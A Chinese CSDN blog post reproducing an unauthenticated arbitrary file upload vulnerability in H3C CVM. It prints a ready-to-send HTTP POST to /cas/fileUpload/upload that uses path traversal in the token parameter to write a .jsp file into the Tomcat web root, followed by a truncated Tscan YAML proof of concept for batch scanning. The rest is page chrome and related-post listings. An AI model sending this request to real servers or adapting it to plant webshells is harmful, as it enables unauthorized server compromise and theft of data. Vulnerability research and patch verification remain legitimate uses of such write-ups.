H3C CVM 前台任意文件上传漏洞(含批量验证poc)

已于 2024-04-05 14:50:02 修改
阅读量363 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
于 2024-04-05 14:49:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137400650
版权

0x01漏洞描述

H3C CVM /cas/fileUpload/upload接口存在任意文件上传漏洞,未授权的攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等

0x02漏洞复现

POST /cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/c.jsp&name=123 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
Accept: /
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Range: bytes 0-10/20
Connection: close

fiigfgm

0x03POC使用(Tscan验证)

params: []
name: H3C CVM 前台任意文件上传漏洞
set:
a4: randomLowercase(7)
a5: '"true"'
body: a4
a3: randomLowercase(8)
rules:



method: POST
path: /ca
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
H3C-校园网自助服务系统flexfileupload任意文件上传
weixin_43567873的博客
03-08 236
H3C-校园网自助服务系统flexfileupload任意文件上传
H3C CVM 前台任意文件上传漏洞复现
0xSec
11-29 1221
H3C CVM/cas/fileUpload/upload接口存在任意文件上传漏洞,未授权的攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。
网站安全之——文件上传攻击漏洞
iteye_5347的博客
06-12 592
转自:http://www.h3c.com.cn/About_H3C/Company_Publication/IP_Lh/2014/05/Home/Catalog/201408/839582_30008_0.htm 不少系统管理员都有过系统被上传后门,木马或者是网页被人篡改的经历,这类攻击相当一部分是通过文件上传进行的。入侵者是如何做到这些的,又该如何防御,本文以PHP脚本语言为例,简要介绍文...
H3C-校园网自助服务系统-flexfileupload-任意文件上传-0day未公开漏洞
qq_39894062的博客
04-08 560
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
H3C云计算《CVM标准版功能原理》培训.rar
07-31
计算责源概念及部署mp4 虚拟交换机原理及部署mp4 CAS存储資源挂载原理及部署1mp4 CAS存储资源挂载原理及部署2.mp4 高可靠性原理及部署mp
H3C CVM 前台任意文件上传漏洞批量验证poc)(2),面试网络安全开发自我介绍
最新发布
2401_83947194的博客
04-17 183
name: H3C CVM 前台任意文件上传漏洞
H3C CVM 前台任意文件上传漏洞批量验证poc)(1),2024年最新网络安全studio基础教程
2301_78399466的博客
04-15 261
name: H3C CVM 前台任意文件上传漏洞
漏洞复现-H3C系列
aming小老弟
03-15 757
H3C用户自助服务平台是一种基于云计算和自动化技术的管理平台,旨在提供自助式、智能化的网络设备和服务管理解决方案。该平台通过集成多种功能和工具,帮助企业用户更高效地管理和维护其网络设备,并提供更好的用户体验。H3C用户自助服务平台dynamiccontent.properties.xhtml接口处存在命令执行漏洞,未经身份验证的攻击者可以利用此漏洞执行任意指令,写入后门文件,导致整个web服务器存在被控的风险。
H3C CVM 前台任意文件上传漏洞.md
07-09
H3C CVM 前台任意文件上传漏洞
H3C_CAS云计算管理平台配置指导书
08-03
H3C_CAS云计算管理平台配置指导书 H3C云配置介绍
H3C CAS云计算最佳实践和配置指导手册汇总集.rar
06-04
13 H3C CAS-CVM双机热备配置指导 14 H3C CAS虚拟机备份恢复配置指导 15 H3C CAS云计算管理平台-云彩虹配置指导 16 H3C CAS云计算管理平台-AEP存储特性配置指导 17 H3C CAS GPU直通配置指导 18 H3C CAS-云容器...
H3C 云计算CAS产品典型配置案例汇总集.rar
09-21
目录: H3C_CAS支持硬件SR-IOV操作指导书 H3C_CAS与趋势产品联调操作配置指导书 H3C_CAS虚拟机内存隔离操作指导书 H3C_CAS虚拟机搭建双机热备环境方案及报告 ) ...H3C_CAS_CVM日志文件收集操作指导书
2021年H3C云计算售前专家_GB10-155.docx
11-03
"2021年H3C云计算售前专家_GB10-155" 本文档总结了 H3C 云计算售前专家的相关知识点,涵盖了云计算、服务器虚拟化、存储协议、网络架构等方面的内容。下面是相关知识点的详细解释: 1. IEEE 工作组指定的新标准名...
H3C任意命令执行漏洞
战神/calmness的博客
05-23 9235
H3C漏洞 目录 简述 过程 修复建议 参考链接 简述 H3C iMC智能管理中心 云计算(cloud computing):“云计算是一种计算模式,利用互联网技术把大量可扩展和弹性的IT相关能力作为一种服务提供给多个用户(Gartner)”。提供资源的网络被称为“云”。“云”中的资源在使用者看来是可以无限扩展的,并且可以随时获取,按需使用,随时扩展,这使得应用提供者无需为繁琐的细节而烦恼,能够更加专注于自己的业务,有利于创新和降低成本。 过程 body="iMC来宾接入自助管理..
fileupload(文件上传)-两种方式
live的专栏
12-17 635
刚刚给前端同事写了一个文件中心功能,用于saas平台的头像上传测试,直接使用原生的Servlet实现,做个文件上传的整理 1.fileupload(文件上传) 方式一: 基于 原生requset本身的getParts()实现文件上传 Collection<Part> coll = req.getParts(); ServletInputStream sin = req.getInp...
h3c虚拟化服务器配置,H3C CAS 虚拟化平台安装部署
weixin_39759155的博客
07-31 6358
H3C CAS 虚拟化平台安装部署H3C CAS采用基于KVM技术的虚拟化解决方案,基于OpenStack架构的虚拟化管理解决方案。CAS软件包扩了CVK,CVM,CIC,SSV。CAS使用的是B/S结构,CAS安装可以将计算节点与控制节点甚至面向用户服务端集中安装也可分开安装。个人认为华三的这套虚拟化系统,更加相似于VMwareVsphere的EXSi,相比之下更完善了面向用户的自主服务,将申请...
FileUpload文件上传
RyanJJ_的博客
05-24 756
1.进行文件上传时,表单需要做的准备: 1).请求方式为POST:<form action="uploadServlet" method="post"....> 2).使用file的表单域:<input type="file" name="file" /> 3).请求的编码方式:<form action="uploadServlet" method="post" en...
R 自编cvm (交叉验证误差)代码
06-06
在R中,计算交叉验证误差(`cvm`)的代码可以自己编写。下面是一个简单的例子,实现了对给定数据集进行10折交叉验证,并计算交叉验证误差: ```R library(glmnet) # 加载数据集 data(iris) x <- as.matrix(iris[,1:4]) y <- iris[,5] # 设置交叉验证的折数 k <- 10 # 计算每个样本所在的折数 folds <- rep(1:k, length.out = nrow(x)) # 初始化交叉验证误差 cvm <- rep(0, k) # 进行k折交叉验证 for(i in 1:k){ # 获取训练集和测试集 x.train <- x[folds != i, ] y.train <- y[folds != i] x.test <- x[folds == i, ] y.test <- y[folds == i] # 进行LASSO回归拟合 fit <- glmnet(x.train, y.train, alpha=1) # 在测试集上进行预测 y.pred <- predict(fit, newx = x.test) # 计算交叉验证误差 cvm[i] <- mean((y.test - y.pred)^2) } # 计算平均交叉验证误差 mean_cvm <- mean(cvm) # 输出结果 cat("交叉验证误差(cvm):", mean_cvm) ``` 注意:这只是一个简单的例子,实际使用时需要根据具体情况进行修改。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值